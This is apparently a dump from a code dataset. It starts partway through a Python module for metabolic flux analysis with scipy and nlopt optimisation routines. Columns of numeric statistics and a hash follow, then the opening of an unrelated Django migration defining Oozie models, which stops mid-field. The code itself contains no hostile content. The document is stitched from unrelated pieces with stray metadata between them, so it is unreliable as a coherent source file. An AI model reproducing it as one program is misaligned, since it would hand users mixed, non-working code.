independent_number = numbers['independent_number']
total_number = numbers['total_number']
#
# Mas=number of MKL thread control
#
try:
import mkl
mkl.set_num_threads(1)
except:
if callbacklevel > 1:
print("mkl-service is not installed this python!")
# zero independent flux
Rm_ind = list(numpy.zeros(independent_number))
#boundaries
lb = list(vectors["lb"])
ub = list(vectors["ub"])
independent_lb = list(vectors["independent_lb"])
independent_ub = list(vectors["independent_ub"])
tmp_r = []
result_Rm = []
result_ind = []
message = "Initial state"
try:
for j in range(3):
message = "Initial state"
#Setting lower and upper boundaries
lb_modified = list(lb)
ub_modified = list(ub)
#Generation of random initial independent vector
for i in range(len(Rm_ind)):
Rm_ind[i] = (independent_ub[i] - independent_lb[i]) * numpy.random.rand() + independent_lb[i]
# Instantialization of Optimization Problem
parameters = {}
parameters['stoichiometric_num'] = numbers['independent_start']
parameters['reaction_num']=numbers['independent_end']
parameters['matrixinv']=matrixinv
parameters['Rm_initial']=numpy.array(list(vectors["Rm_initial"]))
parameters['lb'] = lb_modified
parameters['ub'] = ub_modified
parameters['template'] = template
#
# Scipy
#
res = scipy.optimize.minimize(calc_protrude_scipy, Rm_ind, method='SLSQP', args = (parameters,))
result_ind = res.x
"""
#
# nlopt
#
opt = nlopt.opt(nlopt.LN_COBYLA, independent_number)
opt.set_lower_bounds(independent_lb)
opt.set_upper_bounds(independent_ub)
opt.set_min_objective(lambda x,grad: calc_protrude_nlopt(x,grad,parameters))
opt.set_xtol_abs(0.0001)
opt.set_maxeval(initial_search_iteration_max)
result_ind = opt.optimize(Rm_ind)
minf = opt.last_optimum_value()
"""
result_Rm = numpy.array(list(vectors["Rm_initial"]))
result_Rm[numbers['independent_start']: numbers['independent_end']] = result_ind[:]
tmp_r = numpy.dot(matrixinv, result_Rm)
check = 0;
for i in range(len(tmp_r)):
if tmp_r[i] < lb[i] - 0.0001:
check = check + 1
if tmp_r[i] > ub[i] + 0.0001:
check = check + 1
if check == 0:
message = "Determined"
break
else:
message = "Failed"
except Exception as e:
message = e
else:
pass
finally:
return(tmp_r, result_Rm, result_ind, message)
def calc_protrude_scipy(independent_flux, *args):
"""Objective function used in initializing_Rm_fitting (SLSQP)
This function calculates penalty score of metabolic state out side of the feasible space.
Args:
independent_flux (array): vector of independent flux
*args (list): list of parameters.
Returns:
float: Penalty score
See Also:
initializing_Rm_fitting
"""
kwargs = args[0]
Rm_initial = kwargs['Rm_initial']
stoichiometric_num = kwargs['stoichiometric_num']
reaction_num = kwargs['reaction_num']
matrixinv = kwargs['matrixinv']
lb = kwargs['lb']
ub = kwargs['ub']
template = kwargs['template']
Rm = numpy.array(list(Rm_initial))
Rm[stoichiometric_num: reaction_num] = independent_flux[:]
#
tmp_r = numpy.dot(matrixinv, Rm)
#
f = 0.0
g = []
if len(template) > 0:
#
# if templete flux is available
#
for i, flux in enumerate(tmp_r):
#Between lower and upper boundary
g.append(flux - ub[i])
g.append(lb[i]- flux)
f = f + abs(flux - template[i])
else:
#
# to generate random flux
#
for i, flux in enumerate(tmp_r):
#Between lower and upper boundary
g.append(flux - ub[i])
g.append(lb[i]- flux)
if flux > ub[i]:
f = f + (flux - ub[i])
elif flux < lb[i]:
f = f + (lb[i] - flux)
fail = 0
#print(f)
return f
def calc_protrude_nlopt(independent_flux, grad, kwargs):
"""Objective function used in initializing_Rm_fitting (nlpot)
Calc penalty score of metabolic state out side of the feasible space.
Args:
independent_flux (array): vector of independent flux
grad: not used
*args (array): list of parameters.
Returns:
float: Penalty score
See Also:
initializing_Rm_fitting
"""
Rm_initial = kwargs['Rm_initial']
stoichiometric_num = kwargs['stoichiometric_num']
reaction_num = kwargs['reaction_num']
matrixinv = kwargs['matrixinv']
lb = kwargs['lb']
ub = kwargs['ub']
template = kwargs['template']
Rm = numpy.array(list(Rm_initial))
Rm[stoichiometric_num: reaction_num] = independent_flux[:]
#
tmp_r = numpy.dot(matrixinv, Rm)
#
f = 0.0
g = []
if len(template) > 0:
#
# if templete flux is available
#
for i, flux in enumerate(tmp_r):
#Between lower and upper boundary
g.append(flux - ub[i])
g.append(lb[i]- flux)
f = f + abs(flux - template[i])
else:
#
# to generate random flux
#
for i, flux in enumerate(tmp_r):
#Between lower and upper boundary
g.append(flux - ub[i])
g.append(lb[i]- flux)
if flux > ub[i]:
f = f + (flux - ub[i])
elif flux < lb[i]:
f = f + (lb[i] - flux)
fail = 0
#print(f, grad)
return f
def calc_MDV_from_flux(tmp_r, target_fragments, mdv_carbon_sources, func, timepoint = [], y0temp = []):
"""Low level function to calculate mdv vector and mdv hash from metabolic flux and carbon source MDV using calmdv.
This funcition is called from mfapy.metabolicmodel.show_results.
Args:
tmp_r (array): list of metabolic state data (tmp_r = numpy.dot(matrixinv, Rm_temp)
target_fragments (array): list of targed mdvs for MDV calclation, model.target_fragments.keys()
mdv_carbon_sources (dict): dict of mdv_carbon_sources in model.experiments[ex_id]['mdv_carbon_sources']
func (dict): Dict of functions for MDV calclation in model.func
timepoint (array): For INST mode only. timepoints for MDV comparison in model.experiments[ex_id]['timepoint']
When the length of timepoint array >= 1, INST mode is used.
y0temp (dict): Start IDV state for INST mode
Returns:
13C-MFA mode:
* mdv (array) list of MDV data
* mdv_hash (dict) dict of MDV data
INST-MFA mode:
* mdv (array) array of mdv at each time point
* mdv_hash (array) array of mdv_hash at each time point
Example:
>>> mdv_exp, mdv_hash = optimize.calc_MDV_from_flux(tmp_r, target_fragments_temp, mdv_carbon_sources_temp, self.func)
See Also:
mfapy.metabolicmodel.show_results
"""
if len(timepoint)==0:
mdv, mdv_hash = func["calmdv"](tmp_r, sorted(target_fragments), mdv_carbon_sources)
else:
mdv, mdv_hash = func["diffmdv"](tmp_r, [], timepoint, sorted(target_fragments), mdv_carbon_sources, y0temp)
return mdv, mdv_hash
def fit_r_mdv_scipy(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "SLSQP"):
"""Low level function for model fitting using scipy.optimize.minimize
Args:
configures (dict): "model.configures" including various configulatoins of the model.
experiments (dict): "model.experiments" including experiments defined in the model.
numbers (dict): "model.numbers" including various numbers of the model.
vectors (dict): "model.vector" including various vectors of the model.
matrixinv (2d array): "model.matrixinv" is a inversed matrix for the flux calculation.
func (dict): Dict of functions for MDV calclation in model.func
flux (dict): Dictionary of initial metabolic state.
method (str): "SLSQP" and "COBYLA" are available
Returns:
* state (str) finishing condition
* kai (float) Residual sum of square of fitted metabolic state
* opt_flux (array) list of fitted metabolix state
* Rm_ind_sol (array) list of fitted independent flux
Example:
>>> state, kai, opt_flux, Rm_ind_sol = optimize.fit_r_mdv_scipy(configure, self.experiments, numbers, vectors, self.matrixinv, self.func, flux, method = "SLSQP")
See Also:
calc_MDV_residue_scipy
"""
if isinstance(func, dict):
calmdv = func["calmdv"]
diffmdv = func["diffmdv"]
else:
locals_dic = locals()
exec(func, globals(), locals_dic)
calmdv = locals_dic["calmdv"]
diffmdv = locals_dic["diffmdv"]
#
#
#Set max number of iteration in pyOpt
if 'iteration_max' in configure:
iteration_max = configure['iteration_max']
else:
iteration_max = 1000
#Set callbacklevel
if 'callbacklevel' in configure:
callbacklevel = configure['callbacklevel']
else:
callbacklevel = 0
#
# Mas=number of MKL thread control
#
try:
import mkl
mkl.set_num_threads(1)
except:
if callbacklevel > 1:
print("mkl-service is not installed this python!")
#
# Initial state
#
state = "Initial state"
kai = -1.0
opt_flux = []
result_ind = []
try:
# number of independent flux
independent_number = numbers['independent_number']
ind_start = numbers['independent_start']
ind_end = numbers['independent_end']
total_number = numbers['total_number']
# zero independent flux
if isinstance(flux, dict):
Rm_ind = [flux[group][id]["value"] for (group, id) in vectors['independent_flux']]
else:
Rm_ind = [flux[i] for i in vectors['independent_flux_position']]
#boundaries
lb = list(vectors["lb"])
ub = list(vectors["ub"])
independent_lb = list(vectors["independent_lb"])
independent_ub = list(vectors["independent_ub"])
#
# Generate MDV vector of all defined experiments
#
mdv_exp_original = list(vectors["value"])
mdv_std_original = list(vectors["stdev"])
mdv_use = list(vectors["use"])
for experiment in sorted(experiments.keys()):
mdv_exp_original.extend(experiments[experiment]['mdv_exp_original'])
mdv_std_original.extend(experiments[experiment]['mdv_std_original'])
mdv_use.extend(experiments[experiment]['mdv_use'])
mdv_exp = numpy.array([y for x, y in enumerate(mdv_exp_original) if mdv_use[x] != 0])
spectrum_std = numpy.array([y for x, y in enumerate(mdv_std_original) if mdv_use[x] != 0])
#
# Covariance matrix
#
covinv = numpy.zeros((len(spectrum_std),len(spectrum_std)))
for i, std in enumerate(spectrum_std):
covinv[i,i] = 1.0/(std**2)
state = {'text':"Function was called", 'value': 7}
#try:
##################################################################
if (callbacklevel >= 4):
print("Fitting Start in fit_r_mdv_scipy using ", method)
parameters = {}
parameters['stoichiometric_num'] = ind_start
parameters['reaction_num']=ind_end
parameters['matrixinv']=matrixinv
parameters['experiments']=experiments
parameters['mdv_exp'] = mdv_exp
parameters['mdv_use'] = mdv_use
parameters['covinv']= covinv
parameters['Rm_initial']=numpy.array(list(vectors["Rm_initial"]))
parameters['lb'] = lb
parameters['ub'] = ub
parameters['calmdv'] = calmdv
parameters['diffmdv'] = diffmdv
parameters['callbacklevel'] = callbacklevel
options={'ftol': 0.000000001, 'maxiter': iteration_max}
method_scipy = "SLSQP"
bounds = []
for i in range(independent_number):
bounds.append((independent_lb[i],independent_ub[i]))
#print(independent_lb[i],Rm_ind[i], independent_ub[i])
if method == "SLSQP":
options={'ftol': 0.000000001, 'maxiter': iteration_max}
method_scipy = "SLSQP"
res = scipy.optimize.minimize(calc_MDV_residue_scipy, Rm_ind, bounds = bounds, options = options, method=method_scipy, args = (parameters,))
elif method == "COBYLA":
options={'tol': 0.000000001, 'maxiter': iteration_max}
method_scipy = "COBYLA"
res = scipy.optimize.minimize(calc_MDV_residue_scipy, Rm_ind, options = options, method=method_scipy, args = (parameters,))
else:
options={'ftol': 0.000000001, 'maxiter': iteration_max}
method_scipy = "SLSQP"
res = scipy.optimize.minimize(calc_MDV_residue_scipy, Rm_ind, bounds = bounds, options = options, method=method_scipy, args = (parameters,))
#Optimized flux distribution
result_ind = res.x
#RSS
kai = res.fun
#State of optimizer
state = res.message
if (callbacklevel >= 4):
print("Fitting was successfully finished. RSS = ", kai)
#Optimized flux distribution
Rm_opt = numpy.array(list(vectors["Rm_initial"]))
result_Rm = numpy.array(list(vectors["Rm_initial"]))
result_Rm[numbers['independent_start']: numbers['independent_end']] = result_ind[:]
opt_flux = numpy.dot(matrixinv, numpy.array(result_Rm))
except Exception as e:
state = e
else:
pass
finally:
return(state, kai, opt_flux, result_ind)
def fit_r_mdv_nlopt(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "LN_PRAXIS"):
"""Low level function for model fitting using nlopt.opt
Args:
configures (dict): "model.configures" including various configulatoins of the model.
experiments (dict): "model.experiments" including experiments defined in the model.
numbers (dict): "model.numbers" including various numbers of the model.
vectors (dict): "model.vector" including various vectors of the model.
matrixinv (2d array): "model.matrixinv" is a inversed matrix for the flux calculation.
func (dict): Dict of functions for MDV calclation in model.func
flux (dict): Dictionary of initial metabolic state.
method (str): "LN_COBYLA", "LN_BOBYQA", "LN_NEWUOA", "LN_PRAXIS", "LN_SBPLX", "LN_NELDERMEAD", "GN_DIRECT_L", "GN_CRS2_LM","GN_ESCH"
Returns:
* state (str) finishing condition
* kai (float) Residual sum of square of fitted metabolic state
* opt_flux (array) list of fitted metabolix state
* Rm_ind_sol (array) list of fitted independent flux
Example:
>>> state, kai, opt_flux, Rm_ind_sol = optimize.fit_r_mdv_nlopt(configure, self.experiments, numbers, vectors, self.matrixinv, self.func, flux, method = "LN_PRAXIS")
See Also:
calc_MDV_residue_nlopt
"""
if isinstance(func, dict):
calmdv = func["calmdv"]
diffmdv = func["diffmdv"]
else:
locals_dic = locals()
exec(func, globals(), locals_dic)
calmdv = locals_dic["calmdv"]
diffmdv = locals_dic["diffmdv"]
#
#
#Set max number of iteration in pyOpt
if 'iteration_max' in configure:
iteration_max = configure['iteration_max']
else:
iteration_max = 1000
#Set callbacklevel
if 'callbacklevel' in configure:
callbacklevel = configure['callbacklevel']
else:
callbacklevel = 0
#
# Mas=number of MKL thread control
#
try:
import mkl
mkl.set_num_threads(1)
except:
if callbacklevel > 1:
print("mkl-service is not installed this python!")
#
# Initial state
#
state = "Initial state"
kai = -1.0
opt_flux = []
result_ind = []
try:
# number of independent flux
independent_number = numbers['independent_number']
ind_start = numbers['independent_start']
ind_end = numbers['independent_end']
total_number = numbers['total_number']
# zero independent flux
if isinstance(flux, dict):
Rm_ind = [flux[group][id]["value"] for (group, id) in vectors['independent_flux']]
else:
Rm_ind = [flux[i] for i in vectors['independent_flux_position']]
#boundaries
lb = list(vectors["lb"])
ub = list(vectors["ub"])
independent_lb = list(vectors["independent_lb"])
independent_ub = list(vectors["independent_ub"])
#
# Generate MDV vector of all defined experiments
#
mdv_exp_original = list(vectors["value"])
mdv_std_original = list(vectors["stdev"])
mdv_use = list(vectors["use"])
for experiment in sorted(experiments.keys()):
mdv_exp_original.extend(experiments[experiment]['mdv_exp_original'])
mdv_std_original.extend(experiments[experiment]['mdv_std_original'])
mdv_use.extend(experiments[experiment]['mdv_use'])
mdv_exp = numpy.array([y for x, y in enumerate(mdv_exp_original) if mdv_use[x] != 0])
spectrum_std = numpy.array([y for x, y in enumerate(mdv_std_original) if mdv_use[x] != 0])
#
# Covariance matrix
#
covinv = numpy.zeros((len(spectrum_std),len(spectrum_std)))
for i, std in enumerate(spectrum_std):
covinv[i,i] = 1.0/(std**2)
state = {'text':"Function was called", 'value': 7}
#try:
##################################################################
if (callbacklevel >= 4):
print("Fitting Start infit_r_mdv_nlopt using ", method)
parameters = {}
parameters['stoichiometric_num'] = ind_start
parameters['reaction_num']=ind_end
parameters['matrixinv']=matrixinv
parameters['experiments']=experiments
parameters['mdv_exp'] = mdv_exp
parameters['mdv_use'] = mdv_use
parameters['covinv']= covinv
parameters['Rm_initial']=numpy.array(list(vectors["Rm_initial"]))
parameters['lb'] = lb
parameters['ub'] = ub
parameters['calmdv'] = calmdv
parameters['diffmdv'] = diffmdv
parameters['callbacklevel'] = callbacklevel
#
# nlopt
#
if method == "LN_COBYLA":
opt = nlopt.opt(nlopt.LN_COBYLA, independent_number)
elif method == "LN_BOBYQA":
opt = nlopt.opt(nlopt.LN_BOBYQA, independent_number)
elif method == "LN_NEWUOA":
opt = nlopt.opt(nlopt.LN_NEWUOA, independent_number)
elif method == "LN_PRAXIS":
opt = nlopt.opt(nlopt.LN_PRAXIS, independent_number)
elif method == "LN_SBPLX":
opt = nlopt.opt(nlopt.LN_SBPLX, independent_number)
elif method == "LN_NELDERMEAD":
opt = nlopt.opt(nlopt.LN_NELDERMEAD, independent_number)
elif method == "GN_DIRECT_L":
opt = nlopt.opt(nlopt.GN_DIRECT_L, independent_number)
elif method == "GN_CRS2_LM":
opt = nlopt.opt(nlopt.GN_CRS2_LM, independent_number)
elif method == "GN_ESCH":
opt = nlopt.opt(nlopt.GN_ESCH, independent_number)
else:
opt = nlopt.opt(nlopt.LN_COBYLA, independent_number)
opt.set_xtol_abs(0.000001)
opt.set_maxeval(iteration_max)
opt.set_lower_bounds(independent_lb)
opt.set_upper_bounds(independent_ub)
opt.set_min_objective(lambda x,grad: calc_MDV_residue_nlopt(x,grad,parameters))
#
# Optimizaton
#
result_ind = opt.optimize(Rm_ind)
kai = opt.last_optimum_value()
if (callbacklevel >= 4):
print("Fitting was successfully finished. RSS = ", kai)
#Optimized flux distribution
Rm_opt = numpy.array(list(vectors["Rm_initial"]))
result_Rm = numpy.array(list(vectors["Rm_initial"]))
result_Rm[numbers['independent_start']: numbers['independent_end']] = result_ind[:]
opt_flux = numpy.dot(matrixinv, numpy.array(result_Rm))
#return(state, kai, opt_flux, result_ind)
#return(state,-1,[],[])
except Exception as e:
state = e
else:
pass
finally:
return(state, kai, opt_flux, result_ind)
def fit_r_mdv_deep(configure, experiments, numbers, vectors, matrixinv, func, flux):
"""Low level function for model fitting by iterative fittings.
* 1st iteration: GN_CRS2_LM (global optimizer)
* 2n th iterations: SLSQP (local)
* 2n + 1 th iterations: LN_SBPLX (local)
This combination is empirically best
Args:
configures (dict): "model.configures" including various configulatoins of the model.
experiments (dict): "model.experiments" including experiments defined in the model.
numbers (dict): "model.numbers" including various numbers of the model.
vectors (dict): "model.vector" including various vectors of the model.
matrixinv (2d array): "model.matrixinv" is a inversed matrix for the flux calculation.
func (dict): Dict of functions for MDV calclation in model.func
flux (dict): Dictionary of initial metabolic state.
Returns:
* state (str) finishing condition
* kai (float) Residual sum of square of fitted metabolic state
* opt_flux (array) list of fitted metabolix state
* Rm_ind_sol (array) list of fitted independent flux
Example:
>>> state, kai, opt_flux, Rm_ind_sol = optimize.fit_r_deep(configure, self.experiments, numbers, vectors, self.matrixinv, self.func, flux)
See Also:
optimize.fit_r_nlopt
optimize.fit_r_scipy
"""
#Set max number of repeat
if 'number_of_repeat' in configure:
number_of_repeat = configure['number_of_repeat']
else:
number_of_repeat = 3
#Set max number of iteration in pyOpt
if 'iteration_max' in configure:
iteration_max = configure['iteration_max']
else:
iteration_max = 1000
#Set callbacklevel
if 'callbacklevel' in configure:
callbacklevel = configure['callbacklevel']
else:
callbacklevel = 0
if (callbacklevel >= 4):
print("##Start GN_CRS2_LM method######################################################################")
state, kai, flux, Rm_ind_sol = fit_r_mdv_nlopt(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "GN_CRS2_LM")
for k in range (number_of_repeat):
if (callbacklevel >= 4):
print("Deep",k,"Start SLSQP method######################################################################")
state, kai, flux, Rm_ind_sol = fit_r_mdv_scipy(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "SLSQP")
if (callbacklevel >= 4):
print("Deep",k,"Start LN_SBPLX method###################################################################")
state, kai, flux, Rm_ind_sol = fit_r_mdv_nlopt(configure, experiments, numbers, vectors, matrixinv, func, flux, method = "LN_PRAXIS")
return(state, kai, flux, Rm_ind_sol)
def calc_MDV_residue_scipy(x, *args):
"""Low level function for residual sum of square calculation for model fitting using scipy.optimize.minimize
Args:
x (array): vector of independent flux.
*args (array): list of parameters.
Returns:
float: RSS + Penalty score (When out side of the lower and upper boundaries)
See Also:
fit_r_mdv_scipy
"""
kwargs = args[0]
Rm_initial = kwargs['Rm_initial']
stoichiometric_num = kwargs['stoichiometric_num']
reaction_num = kwargs['reaction_num']
reac_met_num = kwargs['reaction_num']
matrixinv = kwargs['matrixinv']
experiments = kwargs['experiments']
mdv_exp = numpy.array(kwargs['mdv_exp'])
mdv_use = kwargs['mdv_use']
covinv = kwargs['covinv']
lb = kwargs['lb']
ub = kwargs['ub']
calmdv = kwargs['calmdv']
diffmdv = kwargs['diffmdv']
callbacklevel = kwargs['callbacklevel']
Rm = numpy.array(list(Rm_initial))
Rm[stoichiometric_num: reaction_num] = list(x)
tmp_r = numpy.dot(matrixinv, Rm)
g = numpy.hstack((numpy.array(lb) - tmp_r, tmp_r - numpy.array(ub)))
sum = 0.0
for i in g:
if i > 0:
sum = sum + i * 100000
#print(i)
fail = 0
#Determination of MDV
mdv_original = list(tmp_r)
for experiment in sorted(experiments.keys()):
target_emu_list = experiments[experiment]['target_emu_list']
mdv_carbon_sources = experiments[experiment]['mdv_carbon_sources']
#
#
#
if experiments[experiment]['mode'] == "ST":
mdv_original_temp, mdv_hash = calmdv(list(tmp_r), target_emu_list, mdv_carbon_sources)
elif experiments[experiment]['mode'] == "INST":
y0temp = experiments[experiment]['y0']
timepoints = experiments[experiment]['timepoint']
mdv_original_temp, mdv_hash = diffmdv(list(tmp_r), [], timepoints, target_emu_list, mdv_carbon_sources, y0temp)
mdv_original.extend(mdv_original_temp)
mdv = numpy.array([y for x, y in enumerate(mdv_original) if mdv_use[x] != 0])
res = mdv_exp - mdv
f = numpy.dot(res, numpy.dot(covinv, res))
if experiments[experiment]['mode'] == "INST":
if callbacklevel >= 2:
print("RSS:", f)
return f+sum
def calc_MDV_residue_nlopt(x, grad, kwargs):
"""Low level function for residual sum of square calculation for model fitting using nlopt.nlopt
Args:
x (array): vector of independent flux.
*args (array): list of parameters.
Returns:
float: RSS + Penalty score (When out side of the lower and upper boundaries)
See Also:
fit_r_mdv_scipy
"""
Rm_initial = kwargs['Rm_initial']
stoichiometric_num = kwargs['stoichiometric_num']
reaction_num = kwargs['reaction_num']
reac_met_num = kwargs['reaction_num']
matrixinv = kwargs['matrixinv']
experiments = kwargs['experiments']
mdv_exp = numpy.array(kwargs['mdv_exp'])
mdv_use = kwargs['mdv_use']
covinv = kwargs['covinv']
lb = kwargs['lb']
ub = kwargs['ub']
calmdv = kwargs['calmdv']
diffmdv = kwargs['diffmdv']
callbacklevel = kwargs['callbacklevel']
Rm = numpy.array(list(Rm_initial))
Rm[stoichiometric_num: reaction_num] = list(x)
tmp_r = numpy.dot(matrixinv, Rm)
g = numpy.hstack((numpy.array(lb) - tmp_r, tmp_r - numpy.array(ub)))
sum = 0.0
for i in g:
if i > 0:
sum = sum + i * 100000
#print(i)
fail = 0
#Determination of MDV
mdv_original = list(tmp_r)
for experiment in sorted(experiments.keys()):
target_emu_list = experiments[experiment]['target_emu_list']
mdv_carbon_sources = experiments[experiment]['mdv_carbon_sources']
#
#
#
if experiments[experiment]['mode'] == "ST":
mdv_original_temp, mdv_hash = calmdv(list(tmp_r), target_emu_list, mdv_carbon_sources)
elif experiments[experiment]['mode'] == "INST":
y0temp = experiments[experiment]['y0']
timepoints = experiments[experiment]['timepoint']
mdv_original_temp, mdv_hash = diffmdv(list(tmp_r), [], timepoints, target_emu_list, mdv_carbon_sources, y0temp)
mdv_original.extend(mdv_original_temp)
mdv = numpy.array([y for x, y in enumerate(mdv_original) if mdv_use[x] != 0])
res = mdv_exp - mdv
f = numpy.dot(res, numpy.dot(covinv, res))
if experiments[experiment]['mode'] == "INST":
if callbacklevel >= 4:
print("RSS:", f)
return f+sum
def calc_MDV_residue(x, *args, **kwargs):
"""Low level function for residual sum of square calculation from mfapy.metabolicmodel.MetaboliModel.calc_rss
Args:
x (array): vector of independent flux.
*args (array): list of parameters.
**kwargs (dict): dic of parameters.
Returns:
float: RSS + Penalty score (When out side of the lower and upper boundaries)
See Also:
fit_r_mdv_scipy
"""
Rm_initial = kwargs['Rm_initial']
stoichiometric_num = kwargs['stoichiometric_num']
reaction_num = kwargs['reaction_num']
reac_met_num = kwargs['reaction_num']
matrixinv = kwargs['matrixinv']
experiments = kwargs['experiments']
mdv_exp = numpy.array(kwargs['mdv_exp'])
mdv_use = kwargs['mdv_use']
covinv = kwargs['covinv']
lb = kwargs['lb']
ub = kwargs['ub']
calmdv = kwargs['calmdv']
diffmdv = kwargs['diffmdv']
callbacklevel = kwargs['callbacklevel']
#calmdv = kwargs['calmdv']
Rm = numpy.array(list(Rm_initial))
Rm[stoichiometric_num: reaction_num] = list(x)
tmp_r = numpy.dot(matrixinv, Rm)
g = numpy.hstack((numpy.array(lb) - tmp_r, tmp_r - numpy.array(ub)))
sum = 0.0
for i in g:
if i > 0:
sum = sum + i * 100000
#print(i)
fail = 0
#Determination of MDV
mdv_original = list(tmp_r)
for experiment in sorted(experiments.keys()):
target_emu_list = experiments[experiment]['target_emu_list']
mdv_carbon_sources = experiments[experiment]['mdv_carbon_sources']
#
#
#
if experiments[experiment]['mode'] == "ST":
mdv_original_temp, mdv_hash = calmdv(list(tmp_r), target_emu_list, mdv_carbon_sources)
elif experiments[experiment]['mode'] == "INST":
y0temp = experiments[experiment]['y0']
timepoints = experiments[experiment]['timepoint']
mdv_original_temp, mdv_hash = diffmdv(list(tmp_r), [], timepoints, target_emu_list, mdv_carbon_sources, y0temp)
mdv_original.extend(mdv_original_temp)
mdv = numpy.array([y for x, y in enumerate(mdv_original) if mdv_use[x] != 0])
res = mdv_exp - mdv
f = numpy.dot(res, numpy.dot(covinv, res))
if experiments[experiment]['mode'] == "INST":
if callbacklevel >= 4:
print("RSS:", f)
return f + sum
| 33.16
| 201
| 0.616104
| 3,979
| 33,160
| 4.958784
| 0.087459
| 0.007906
| 0.015407
| 0.00892
| 0.813948
| 0.778369
| 0.763773
| 0.739902
| 0.729309
| 0.723633
| 0
| 0.008275
| 0.263872
| 33,160
| 999
| 202
| 33.193193
| 0.8
| 0.05579
| 0
| 0.81289
| 0
| 0
| 0.126225
| 0.012482
| 0
| 0
| 0
| 0.001001
| 0
| 0
| null | null | 0.006237
| 0.012474
| null | null | 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a6b94405c5085fab7f877decc237d7397b6741b
| 87,842
|
py
|
Python
|
apps/oozie/src/oozie/migrations/0001_initial.py
|
kokosing/hue
|
2307f5379a35aae9be871e836432e6f45138b3d9
|
[
"Apache-2.0"
] | 3
|
2018-01-29T14:16:02.000Z
|
2019-02-05T21:33:05.000Z
|
apps/oozie/src/oozie/migrations/0001_initial.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 4
|
2021-03-11T04:02:00.000Z
|
2022-03-27T08:31:56.000Z
|
apps/oozie/src/oozie/migrations/0001_initial.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 2
|
2019-12-05T17:24:36.000Z
|
2021-11-22T21:21:32.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-06-06 18:55
from __future__ import unicode_literals
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BundledCoordinator',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('parameters', models.TextField(default=b'[{"name":"oozie.use.system.libpath","value":"true"}]', help_text='Constants used at the submission time (e.g. market=US, oozie.use.system.libpath=true).', verbose_name='Parameters')),
],
),
migrations.CreateModel(
name='DataInput',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The name of the variable of the workflow to automatically fill up.', max_length=40, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name of an input variable in the workflow.')),
],
),
migrations.CreateModel(
name='DataOutput',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The name of the variable of the workflow to automatically filled up.', max_length=40, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name of an output variable in the workflow')),
],
),
migrations.CreateModel(
name='Dataset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The name of the dataset.', max_length=40, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name')),
('description', models.CharField(blank=True, default=b'', help_text='A description of the dataset.', max_length=1024, verbose_name='Description')),
('start', models.DateTimeField(auto_now=True, help_text=' The UTC datetime of the initial instance of the dataset. The initial instance also provides the baseline datetime to compute instances of the dataset using multiples of the frequency.', verbose_name='Start')),
('frequency_number', models.SmallIntegerField(choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (18, 18), (19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29), (30, 30), (31, 31), (32, 32), (33, 33), (34, 34), (35, 35), (36, 36), (37, 37), (38, 38), (39, 39), (40, 40), (41, 41), (42, 42), (43, 43), (44, 44), (45, 45), (46, 46), (47, 47), (48, 48), (49, 49), (50, 50), (51, 51), (52, 52), (53, 53), (54, 54), (55, 55), (56, 56), (57, 57), (58, 58), (59, 59), (60, 60)], default=1, help_text='The number of units of the rate at which data is periodically created.', verbose_name='Frequency number')),
('frequency_unit', models.CharField(choices=[(b'minutes', 'Minutes'), (b'hours', 'Hours'), (b'days', 'Days'), (b'months', 'Months')], default=b'days', help_text='The unit of the rate at which data is periodically created.', max_length=20, verbose_name='Frequency unit')),
('uri', models.CharField(default=b'/data/${YEAR}${MONTH}${DAY}', help_text='The URI template that identifies the dataset and can be resolved into concrete URIs to identify a particular dataset instance. The URI consist of constants (e.g. ${YEAR}/${MONTH}) and configuration properties (e.g. /home/${USER}/projects/${PROJECT})', max_length=1024, verbose_name='URI')),
